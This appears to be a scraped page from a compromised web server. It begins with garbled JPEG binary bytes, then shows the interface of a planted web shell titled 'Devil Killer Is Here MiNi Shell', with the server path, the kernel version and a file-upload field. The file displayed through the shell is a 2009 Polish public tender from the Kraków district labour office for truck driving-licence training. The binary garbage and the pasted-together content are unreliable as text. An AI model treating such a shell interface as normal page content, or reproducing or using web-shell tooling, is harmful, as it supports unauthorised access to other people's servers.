JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/157384-N-2009.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego 
prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 206 000 euro 
na usługę szkoleniową pod nazwą  
Prawo jazdy kategorii C oraz prawo jazdy kategorii C + E
znak sprawy: ZP- 271/22/2009</b><br>
<b>Numer ogłoszenia: 157384 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego 
prowadzonego w trybie przetargu nieograniczonego o wartości poniżej 206 000 euro 
na usługę szkoleniową pod nazwą  
Prawo jazdy kategorii C oraz prawo jazdy kategorii C + E
znak sprawy: ZP- 271/22/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pod nazwą Prawo jazdy kategorii C oraz prawo jazdy kategorii C + E dla osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego.
Zamawiający dopuszcza składanie ofert częściowych:
Część I - szkolenie pod nazwą Prawo jazdy kategorii C
Część II - szkolenie pod nazwą Prawo jazdy kategorii C + E
Wykonawca może złożyć ofertę na każdą część zamówienia. 
2.	W ramach kursu prawa jazdy na kategorię C przeszkolonych będzie 40 osób w ramach 4 grup 10-osobowych, na kategorię C+E 15 osób w ramach 3 grup 5-osobowych.
3.	Każda grupa rozpoczynać będzie zajęcia szkoleniowe pierwszego dnia roboczego miesiąca. Warunek ten należy mieć na uwadze przy sporządzaniu harmonogramu. 
4.	Wykonawca zobowiązany będzie do zorganizowania jednego egzaminu zewnętrznego, którego koszt zostanie wliczony w cenę szkolenia. W przypadku, gdy uczestnik zajęć nie zda egzaminu zewnętrznego zorganizowanego przez Wykonawcę - Zamawiający nie będzie ponosił kosztów jego poprawki.
5.	Ilość godzin kursu na kat. C wynosi 51 godzin, w tym 20 godzin zajęć teoretycznych , 30 godzin zajęć praktycznych oraz 1 godzina przeznaczona na egzamin wewnętrzny.

Ilość godzin kursu na kat. C + E wynosi 46 godzin, w tym 20 godzin zajęć teoretycznych, 25 godzin zajęć praktycznych oraz 1 godzina przeznaczona na egzamin wewnętrzny.

Zajęcia teoretyczne: 1 godzina = 45 minut
Zajęcia praktyczne: 1 godzina = 60 minut

Dzienny wymiar zajęć dydaktycznych nie może przekroczyć 7 godzin zajęć teoretycznych. Zajęcia odbywać się będą od poniedziałku do piątku, w godzinach pomiędzy 8.00 a 18.00          z uwzględnieniem dwóch przerw kawowych dla uczestników realizujących zajęcia teoretyczne.
Zajęcia praktyczne obejmują zajęcia na placu manewrowym i w ruchu drogowym, rozpoczynają się po przeprowadzeniu zajęć teoretycznych.
Przeprowadzenie zajęć, zarówno praktycznych jak i teoretycznych, winno być potwierdzone            w karcie przeprowadzonych zajęć każdorazowo po ich zakończeniu przez osobę prowadzącą zajęcia i uczestnika zajęć.
Miejsce realizacji szkolenia winno znajdować się w mieście Krakowie, w miejscu dogodnym pod względem dojazdu dla osób dojeżdżających z terenu Powiatu Krakowskiego.

6.	Wykonawca zobowiązany będzie do zapewnienia wszystkim uczestnikom materiałów dydaktycznych, jak również do przekazania jednego kompletu do Urzędu Pracy Powiatu Krakowskiego (jeżeli zachodzi taka konieczność, Wykonawca wlicza w cenę szkolenia koszt przeznaczonego dla UPPK zestawu materiałów dydaktycznych). Dodatkowo, Wykonawca wyposaży uczestników zajęć w niezbędne materiały piśmienne i biurowe.
7.	Szkolenie winno zakończyć się oceną nabytych umiejętności w postaci egzaminu, wydaniem zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C, kat. C+E oraz certyfikatu opatrzonego logo Unii Europejskiej, EFS a także logo projektu 7 Życzeń.
Na wniosek Wykonawcy Zamawiający prześle elektroniczną wersję wymaganych oznakowań i logo.
Wzór zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C, kat. C+E oraz wzór certyfikatu, potwierdzone za zgodność z oryginałem przez uprawnionego przedstawiciela Wykonawcy, winny być załączone do oferty. 

8.	Podstawowy zakres programu szkolenia musi być zgodny z programem nauczania zawartym w ustawie Prawo o ruchu drogowym oraz rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz. 1834).
9.	Program szkolenia musi zawierać informacje, o których mówi Rozporządzenie Ministra Pracy i Polityki Społecznej z dn. 02  marca 2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 476, poz. 315), a mianowicie:
a)	Nazwę i zakres szkolenia
b)	Czas trwania i sposób organizacji szkolenia
c)	Wymagania wstępne dla uczestników szkolenia
d)	Cele szkolenia
e)	Plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,                    z uwzględnieniem części teoretycznej i praktycznej
f)	Treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
g)	Wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych
h)	Sposób sprawdzenia efektów szkolenia.
10.	Wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji: 
a)	Dzienna lista obecności uczestników szkolenia;
b)	Dziennik zajęć zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych;
c)	Oświadczenia uczestników potwierdzających odbiór materiałów dydaktycznych i biurowych;
d)	Oświadczenia uczestników potwierdzających odbiór ciepłych posiłków;
e)	Imienna lista, na której uczestnicy szkolenia będą potwierdzać otrzymanie zwrotu kosztów przejazdu na szkolenie;
f)	Rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenie; 
g)	Protokół z egzaminu, jeżeli zostanie przeprowadzony. 
11.	Wykonawca zobowiązany będzie do przechowywania dokumentów potwierdzających realizację przedmiotowego szkolenia, a w szczególności: programu szkolenia, harmonogramu, dokumentów związanych z kosztami kursu, kosztorys, listy obecności uczestników, do dnia 31 grudnia 2020 roku.
12.	Na zakończenie kursu, Wykonawca wypłaci uczestnikom szkolenia zwrot kosztów przejazdu w wysokości 10,00 PLN (słownie: dziesięć złotych 00/100) za każdy dzień obecności na zajęciach. Podstawą do naliczenia wysokości zwrotu będzie lista obecności. Kwotę zwrotu kosztów przejazdu za  uczestników kursu należy wliczyć w cenę szkolenia wskazaną w formularzu ofertowym.
13.	Na podstawie art. 41 ust.7 i ust. 8 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.) Wykonawca zobowiązany będzie do ubezpieczenia uczestników kursu do następstw nieszczęśliwych wypadków z wyłączeniem osób posiadających prawo do stypendium szkoleniowego. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć.
14.	Wykonawca zobowiązany będzie do informowania społeczeństwa o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczanie w dokumentacji szkoleniowej informacji o udziale Unii Europejskiej a także oznakowania miejsca realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.7.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006)  i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013
15.	Wykonawca, w trakcie realizacji zajęć teoretycznych, zapewni  dostęp do serwisu kawowego (tj. kawy, herbaty, wody mineralnej, drożdżówek lub ciasteczek) a także jeden ciepły, jednodaniowy posiłek dziennie.
16.	Wykonawca, pod  rygorem  utraty prawa do zapłaty za  szkolenie, zobowiązany będzie do niezwłocznego   poinformowania Zamawiającego  o:
a)	Nie zgłoszeniu się Uczestników na  szkolenie,
b)	Przerwaniu szkolenia lub rezygnacji  z  uczestnictwa oraz każdorazowej nieobecności skierowanych  osób bezrobotnych,
c)	Innych sytuacjach, które mają wpływ na realizację programu szkolenia. i umowy.
17.	Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie do 5 dni od dnia zakończenia szkolenia, następujących dokumentów:
a)	Oryginału ankiet oceniających przeprowadzonych wśród uczestników szkolenia;
b)	Oryginału imiennego wykazu osób, które ukończyły szkolenie;
c)	Oryginału imiennego wykazu osób, które nie ukończyły szkolenia; 
d)	Kserokopii rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji poświadczony za zgodność z oryginałem;
e)	Kserokopii dziennika zajęć poświadczona za zgodność z oryginałem;
f)	Kserokopii  list obecności poświadczona za zgodność z oryginałem;
g)	Kserokopii protokołu z egzaminu;
h)	Oryginału kosztorysu powykonawczego;
i)	Kserokopii wszystkich zaświadczeń i certyfikatów potwierdzających ukończenie szkolenia, poświadczone za zgodność z oryginałem;
j)	Oryginału oświadczeń uczestników potwierdzających odbiór materiałów dydaktycznych, ciepłych posiłków;
k)	Oryginału imiennej listy, na której uczestnicy potwierdzą otrzymanie zwrotu kosztów przejazdu;
l)	Inną dokumentację niezbędną do rozliczenia kursu.
18.	Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. W zakresie warunków lokalowych musi posiadać co najmniej jedną salę o powierzchni nie mniejszej niż 25 m kw., wyposażoną w stoliki i miejsca siedzące. Sale dydaktyczne powinny być wyposażone w sprzęt audiowizualny, flipchart, tablice szkolne lub magnetyczne, makietę lub programy komputerowe umożliwiające symulowanie sytuacji na drodze, filmy video prezentujące zasady bezpieczeństwa, ruchu drogowego, zasady kierowania pojazdem, czynności kontrolno - obsługowe, zasady udzielania pierwszej pomocy. Do oferty należy załączyć informację dotyczącą lokalizacji, w której realizowane będą zajęcia wraz ze szczegółowym opisem wyposażenia sal dydaktycznych,                            a  w przypadku zajęć praktycznych,  wymienić należy wykorzystywany podczas zajęć sprzęt i urządzenia oraz ich ilość. Plac manewrowy , utwardzony, o powierzchni 180 m kw., wyposażony w pachołki i tyczki o łącznej wysokości 2 m, winien być wyłączony z ruchu pojazdów innych niż przeznaczone do nauki jazdy. Pojazdy wykorzystywane do prowadzenia szkolenia muszą być dopuszczone do ruchu, przystosowane do nauki jazdy, muszą spełniać wymagania określone w przepisach dot. warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia, muszą także być oznaczone nazwą i adresem ośrodka szkoleniowego.

19.	Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia, m.in. na podstawie formularza ankiety oceniającej - stanowiącej załącznik nr 9 do SIWZ, jak również do przedstawienia jej wyników Zamawiającemu. 
20.	Wykonawca, przed rozpoczęciem szkolenia, zobowiązany będzie do zapoznania jego uczestników ze szczegółowym programem poprzez przekazanie im harmonogramu realizowanych zajęć..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych:
1.	Posiadają uprawnienia do wykonywania  określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności uzyskali wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej;
2.	Posiadają niezbędną wiedzę i doświadczenie, a w szczególności: 
a)	przeprowadzili w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 3 szkolenia z zakresu prawa jazdy w kategorii dla której składana jest oferta. Przeprowadzone szkolenia mają obejmować łącznie wszystkie elementy wskazane w nazwie przedmiotowego zamówienia, 
b)	przeszkolili z zakresu prawa jazdy w kategorii dla której składana jest oferta w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 30 osób.

3.	Dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub
      będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
 a w szczególności: dysponują lub będą dysponować co najmniej dwoma pojazdami właściwymi dla kategorii, dla której składana jest oferta. Pojazdy te będą przeznaczone do realizacji niniejszego zamówienia, w celu odbycia zajęć praktycznych;
4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
5.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,            w oparciu o informacje zawarte w złożonych oświadczeniach i dokumentach wyszczególnionych             w  dziale IV SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. Niespełnienie tych warunków będzie skutkować wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Formularz ofertowy - załącznik nr 2a i 2b do SIWZ;
2.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy         z dnia 29 stycznia 2004 r. Prawo zamówień publicznych -  załącznik  nr 3 do SIWZ; 
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4.	Wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej;
5.	Szczegółowy program szkolenia opracowany na podstawie wytycznych zawartych              w załączniku nr 1 do SIWZ;
6.	Harmonogram zajęć rozpisany na poszczególne grupy, dni i godziny trwania szkolenia,       z podaniem tematyki  i rodzaju zajęć, czasu ich trwania oraz nazwiska osoby prowadzącej oraz uwzględnieniem warunku, że zajęcia.
7.	Wykaz zrealizowanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, kursów z zakresu objętego przedmiotowym zamówieniem, z podaniem ilości przeszkolonych osób, dat realizacji, wartości oraz odbiorców, załącznik nr 3a i 3b do SIWZ. 
Na potwierdzenie należytego zrealizowania wykazanych usług należy załączyć stosowne dokumenty (np. referencje). Zamawiający, podczas liczenia punktacji, będzie brał pod uwagę tylko te szkolenia, których rzetelność realizacji poświadczona zostanie powyższymi dokumentami;
8.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje Wykonawca, załącznik nr 4a i 4b do SIWZ;
9.	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeżeli w wykazie o którym mowa w podpunkcie 9  Wykonawca wykazał narzędzia lub urządzenia , którymi będzie dysponował.
10.	Pełnomocnictwo pracownika/osoby do reprezentowania wykonawcy w postępowaniu przetargowym w tym podpisywania dokumentów przetargowych, jeżeli nie wynika to z dokumentu rejestracyjnego (ewidencyjnego), o którym mowa w podpunkcie 3; 
11.	Propozycje zlecenia wykonania części usług podwykonawcom z określeniem zakresu realizowanych przez nich prac, załącznik nr 5a i 5b do SIWZ;
12.	Preliminarz kosztów - załącznik nr 6a i 6b do SIWZ.
13.	Certyfikat jakości usług (np.: akredytacja kuratora oświaty, certyfikat systemu zarządzania jakością kształcenia/szkolenia) wydany przez instytucję do tego uprawnioną, który potwierdzałby wysoki standard świadczonych usług, jeżeli Wykonawca taki posiada.
14.	Wzór zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C lub kat. C+E oraz wzór certyfikatu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50.00</li>
<li>2 - liczba przeprowadzonych szkoleń z zakresu objętego przedmiotowym zamówieniem w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzi - 10.00</li>
<li>3 - liczba osób przeszkolonych z zakresu objętego przedmiotowym zamówieniem w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzieleni - 10.00</li>
<li>4 - certyfikat jakości usług, który potwierdzałby wysoki standard świadczonych usług - 30.00</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT  WSPÓŁFINANSOWANY 
Z EUROPEJSKIEGO FUNDUSZU SPOŁECZNEGO
REALIZOWANY W RAMACH 
PODDZIAŁANIA 6.1.3
PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prawo jazdy kategorii C..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pod nazwą Prawo jazdy kategorii C dla osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego.
2.	W ramach kursu prawa jazdy na kategorię C przeszkolonych będzie 40 osób w ramach 4 grup 10-osobowych. 
3.	Każda grupa rozpoczynać będzie zajęcia szkoleniowe pierwszego dnia roboczego miesiąca. Warunek ten należy mieć na uwadze przy sporządzaniu harmonogramu. 
4.	Wykonawca zobowiązany będzie do zorganizowania jednego egzaminu zewnętrznego, którego koszt zostanie wliczony w cenę szkolenia. W przypadku, gdy uczestnik zajęć nie zda egzaminu zewnętrznego zorganizowanego przez Wykonawcę - Zamawiający nie będzie ponosił kosztów jego poprawki.
5.	Ilość godzin kursu na kat. C wynosi 51 godzin, w tym 20 godzin zajęć teoretycznych , 30 godzin zajęć praktycznych oraz 1 godzina przeznaczona na egzamin wewnętrzny.
Zajęcia teoretyczne: 1 godzina = 45 minut
Zajęcia praktyczne: 1 godzina = 60 minut
Dzienny wymiar zajęć dydaktycznych nie może przekroczyć 7 godzin zajęć teoretycznych. Zajęcia odbywać się będą od poniedziałku do piątku, w godzinach pomiędzy 8.00 a 18.00          z uwzględnieniem dwóch przerw kawowych dla uczestników realizujących zajęcia teoretyczne.
Zajęcia praktyczne obejmują zajęcia na placu manewrowym i w ruchu drogowym, rozpoczynają się po przeprowadzeniu zajęć teoretycznych.
Przeprowadzenie zajęć, zarówno praktycznych jak i teoretycznych, winno być potwierdzone            w karcie przeprowadzonych zajęć każdorazowo po ich zakończeniu przez osobę prowadzącą zajęcia i uczestnika zajęć.
Miejsce realizacji szkolenia winno znajdować się w mieście Krakowie, w miejscu dogodnym pod względem dojazdu dla osób dojeżdżających z terenu Powiatu Krakowskiego.

6.	Wykonawca zobowiązany będzie do zapewnienia wszystkim uczestnikom materiałów dydaktycznych, jak również do przekazania jednego kompletu do Urzędu Pracy Powiatu Krakowskiego (jeżeli zachodzi taka konieczność, Wykonawca wlicza w cenę szkolenia koszt przeznaczonego dla UPPK zestawu materiałów dydaktycznych). Dodatkowo, Wykonawca wyposaży uczestników zajęć w niezbędne materiały piśmienne i biurowe.
7.	Szkolenie winno zakończyć się oceną nabytych umiejętności w postaci egzaminu, wydaniem zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C oraz certyfikatu opatrzonego logo Unii Europejskiej, EFS a także logo projektu 7 Życzeń.
Na wniosek Wykonawcy Zamawiający prześle elektroniczną wersję wymaganych oznakowań i logo.
Wzór zaświadczenia o ukończeniu szkolenia dla osób ubiegających się o prawo jazdy kat. C oraz wzór certyfikatu, potwierdzone za zgodność z oryginałem przez uprawnionego przedstawiciela Wykonawcy, winny być załączone do oferty. 
8.	Podstawowy zakres programu szkolenia musi być zgodny z programem nauczania zawartym w ustawie Prawo o ruchu drogowym oraz rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217, poz. 1834).
